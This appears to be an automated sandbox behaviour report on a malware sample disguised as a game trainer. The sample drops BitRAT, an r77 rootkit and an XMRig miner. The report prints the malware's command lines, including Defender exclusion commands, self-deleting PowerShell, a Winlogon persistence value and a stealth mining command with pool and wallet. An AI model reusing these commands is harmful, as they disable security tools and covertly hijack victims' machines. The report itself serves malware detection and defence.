Analysis Overview
SHA256
62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128
Threat Level: Known bad
The file 62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128 was found to be: Known bad.
Malicious Activity Summary
xmrig
Modifies WinLogon for persistence
r77 rootkit payload
BitRAT
r77
XMRig Miner Payload
Executes dropped EXE
Checks computer location settings
Suspicious use of SetThreadContext
Suspicious use of NtSetInformationThreadHideFromDebugger
Enumerates physical storage devices
Program crash
Suspicious behavior: EnumeratesProcesses
Modifies registry class
Suspicious use of SetWindowsHookEx
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-03-10 13:31
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-03-10 13:31
Reported
2022-03-10 13:34
Platform
win7-20220223-en
Max time kernel
4294178s
Max time network
121s
Signatures
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
"C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe"
Network
Files
Analysis: behavioral2
Detonation Overview
Submitted
2022-03-10 13:31
Reported
2022-03-10 13:35
Platform
win10v2004-en-20220112
Max time kernel
162s
Max time network
165s
Signatures
BitRAT
Modifies WinLogon for persistence
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (str) | \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe,\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\WindowUpdate.exe\"," | C:\Users\Admin\AppData\Roaming\WindowUpdate.exe | N/A |
r77
r77 rootkit payload
xmrig
XMRig Miner Payload
Executes dropped EXE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Minecraft Dungeons v1.0-v1.5.0.0 Plus 12 Trainer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\MicrosoftSecurity.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\WindowUpdate.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\MSBuild.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key value queried | \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\MicrosoftSecurity.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\WindowUpdate.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| PID 3768 set thread context of 428 | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe |
| PID 2180 set thread context of 3004 | N/A | C:\Users\Admin\AppData\Roaming\MicrosoftSecurity.exe | C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe |
| PID 3632 set thread context of 3032 | N/A | C:\Users\Admin\AppData\Roaming\WindowUpdate.exe | C:\Users\Admin\AppData\Local\Temp\MSBuild.exe |
| PID 3032 set thread context of 3368 | N/A | C:\Users\Admin\AppData\Local\Temp\MSBuild.exe | C:\Windows\explorer.exe |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\WerFault.exe | C:\Windows\explorer.exe |
| N/A | N/A | C:\Windows\system32\WerFault.exe | C:\Windows\explorer.exe |
Modifies registry class
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000_Classes\Local Settings | C:\Users\Admin\AppData\Roaming\MicrosoftSecurity.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000_Classes\Local Settings | C:\Users\Admin\AppData\Roaming\WindowUpdate.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\Minecraft Dungeons v1.0-v1.5.0.0 Plus 12 Trainer.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\MicrosoftSecurity.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\WindowUpdate.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
"C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe"
C:\Users\Admin\AppData\Roaming\Minecraft Dungeons v1.0-v1.5.0.0 Plus 12 Trainer.exe
"C:\Users\Admin\AppData\Roaming\Minecraft Dungeons v1.0-v1.5.0.0 Plus 12 Trainer.exe"
C:\Users\Admin\AppData\Roaming\MicrosoftSecurity.exe
"C:\Users\Admin\AppData\Roaming\MicrosoftSecurity.exe"
C:\Users\Admin\AppData\Roaming\WindowUpdate.exe
"C:\Users\Admin\AppData\Roaming\WindowUpdate.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\_Snmfuhdh.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\_Rtizxvdftafqcz.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-Sleep -s 5; Remove-Item -Path "C:\Users\Admin\AppData\Roaming\WindowUpdate.exe" -Force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-Sleep -s 5; Remove-Item -Path "C:\Users\Admin\AppData\Roaming\MicrosoftSecurity.exe" -Force
C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe
C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe
C:\Users\Admin\AppData\Local\Temp\MSBuild.exe
C:\Users\Admin\AppData\Local\Temp\MSBuild.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\,'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WindowUpdate.exe'
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\,'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MicrosoftSecurity\MicrosoftSecurity.exe'
C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:14433 --user=484hzHaCUfmXhMq4nCE1wcFuQ1TVa8BPjdq5oYseNQHoDWQXS8of2U9VLnQ1cL7TVzbRVyY1Su76CAdcDdHxjXrbRbec8LG.rig1/pandalord143 --pass= --cpu-max-threads-hint=20 --donate-level=5 --cinit-idle-wait=5 --cinit-idle-cpu=80 --tls --cinit-stealth
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 356 -p 3368 -ip 3368
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3368 -s 292
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 472 -p 3368 -ip 3368
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3368 -s 296
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 8.238.111.254:80 | | tcp |
| NL | 8.248.7.254:80 | | tcp |
| NL | 8.248.7.254:80 | | tcp |
| US | 8.8.8.8:53 | geo.prod.do.dsp.mp.microsoft.com | udp |
| IE | 51.104.164.114:443 | geo.prod.do.dsp.mp.microsoft.com | tcp |
| US | 8.8.8.8:53 | kv801.prod.do.dsp.mp.microsoft.com | udp |
| NL | 184.29.205.60:443 | kv801.prod.do.dsp.mp.microsoft.com | tcp |
| US | 8.8.8.8:53 | cp801.prod.do.dsp.mp.microsoft.com | udp |
| NL | 184.29.205.60:443 | cp801.prod.do.dsp.mp.microsoft.com | tcp |
| NL | 184.29.205.60:443 | cp801.prod.do.dsp.mp.microsoft.com | tcp |
| US | 8.8.8.8:53 | cp801.prod.do.dsp.mp.microsoft.com | udp |
| NL | 184.29.205.60:443 | cp801.prod.do.dsp.mp.microsoft.com | tcp |
| NL | 184.29.205.60:443 | cp801.prod.do.dsp.mp.microsoft.com | tcp |
| US | 8.8.8.8:53 | gumerez.xyz | udp |
| NL | 37.0.11.77:1991 | gumerez.xyz | tcp |
| NL | 37.0.11.77:1991 | gumerez.xyz | tcp |
Files
C:\Users\Admin\AppData\Roaming\Minecraft Dungeons v1.0-v1.5.0.0 Plus 12 Trainer.exe
| MD5 | 2ad4097e232d4002a5e90fa049607869 |
| SHA1 | 9a860a3781854339d3482dd57e75a363c1bde12e |
| SHA256 | b4ad220b7ddd80ec7127f18b9b88e96fcb6a5d4de5c0789f845ad4b8e17acd66 |
| SHA512 | 5911396c485fd00a69a931333e684ee868d3dff22eec59182dc1def719a2ebb943d916b7a8929cac8d3f6ad4b948a5787040110da0cd3d234b48e73df857c277 |
C:\Users\Admin\AppData\Roaming\MicrosoftSecurity.exe
| MD5 | 2daa88a0e9da6be6cf972bdb6ebd1ed7 |
| SHA1 | c92d498fe840c676b941494fd30624ee4b91bf19 |
| SHA256 | dfefe990b42699d23b3ada5b3e1c808cc27d48d69cffd6da82bbea92b12fd11c |
| SHA512 | 0dd30b775168b1c8b8f3fb7c2ee6074c0b617c344849b29d16600282c5bbe3db7a39bcd8f7e28d201b3c5ccc138cef3af3bfca527c925d83e28ddc77e154981c |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe.log
| MD5 | 89367199dcebc9edec7c34f3eaf57f5f |
| SHA1 | e344c634845a8d8fc908ceb38df15a26c3f10337 |
| SHA256 | 1ddb35177c237e096d50a243a9ff8bfd8ed98921dc0ecfd1f2e941d463293f72 |
| SHA512 | 6ee8b58a1d432f9ffeea9a8d9d9ad75b66f2e609402c4596fff8debc1f746f5ce695e66c1feae01d87b1803e4ccc55aa3c894f6cf5046634e12a5f7292e18131 |
C:\Users\Admin\AppData\Roaming\WindowUpdate.exe
| MD5 | 50d63ac6d3d7534ab90cdebb34dd3913 |
| SHA1 | 61b04d2c8caa511db49ac8305e85466cb2d3c147 |
| SHA256 | ae8480f3ff00fbfe5b111e7af0ee897c3e237a53b22545f89758f86f03f1dcff |
| SHA512 | 6ba857367b150fbc38e959aea2f33a76d259dafd0d82973f13816482fa0bacde534fc6af07bbd3acef9041cf9989d0f8c7d9ae4b9e5a021c9a82a8841aadaaab |
C:\Users\Admin\AppData\Local\Temp\_Snmfuhdh.vbs
| MD5 | 41ba08c2482349cca240dab7a700c99b |
| SHA1 | 7092954d24879f12a4af640b5e4751a61b85875d |
| SHA256 | a3d7b48a1ce8ce3d2a205c5f1a25a84e07d114a747e181e33c17ab3e28cd690b |
| SHA512 | d3dc824461f5927ca33487ad6341fb70899c3335ae0a7de098b346d65ec0fc9873f1853e1fe99e4a499e5904f50ba9ab91186fbf59f9c9433f36affee0aef6b7 |
C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe
| MD5 | 5d4073b2eb6d217c19f2b22f21bf8d57 |
| SHA1 | f0209900fbf08d004b886a0b3ba33ea2b0bf9da8 |
| SHA256 | ac1a3f21fcc88f9cee7bf51581eafba24cc76c924f0821deb2afdf1080ddf3d3 |
| SHA512 | 9ac94880684933ba3407cdc135abc3047543436567af14cd9269c4adc5a6535db7b867d6de0d6238a21b94e69f9890dbb5739155871a624520623a7e56872159 |
C:\Users\Admin\AppData\Local\Temp\MSBuild.exe
| MD5 | 2edd0b288fe2459da84e4274d1942343 |
| SHA1 | c6d88db3c6871b3bb7f9ba9bde893bfcac7c7ee4 |
| SHA256 | 6891da439a64108cc7fd7ca27f14bd726844b20c084506c13681078f5d9a3768 |
| SHA512 | 6c7b06101e33001a5e345246182cc2418bef0c310c382f55ecac9826773b8e37131c1d56a34aaf144f544e3047a55867aa9f22c82c59bbacb262c20dbb5b47f9 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 556084f2c6d459c116a69d6fedcc4105 |
| SHA1 | 633e89b9a1e77942d822d14de6708430a3944dbc |
| SHA256 | 88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8 |
| SHA512 | 0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 22fbec4acba323d04079a263526cef3c |
| SHA1 | eb8dd0042c6a3f20087a7d2391eaf48121f98740 |
| SHA256 | 020e5d769893724f075e10b01c59bf2424214cefe6aafbab6f44bc700f525c40 |
| SHA512 | fb61d737de8cbed6b7d8b5a35911c46ef26a2927a52ed7add9d594cf19dcab1b9978b61912c6f3fe4f29228f4454fb022fb2e167788c727dc6503c1fcd42159e |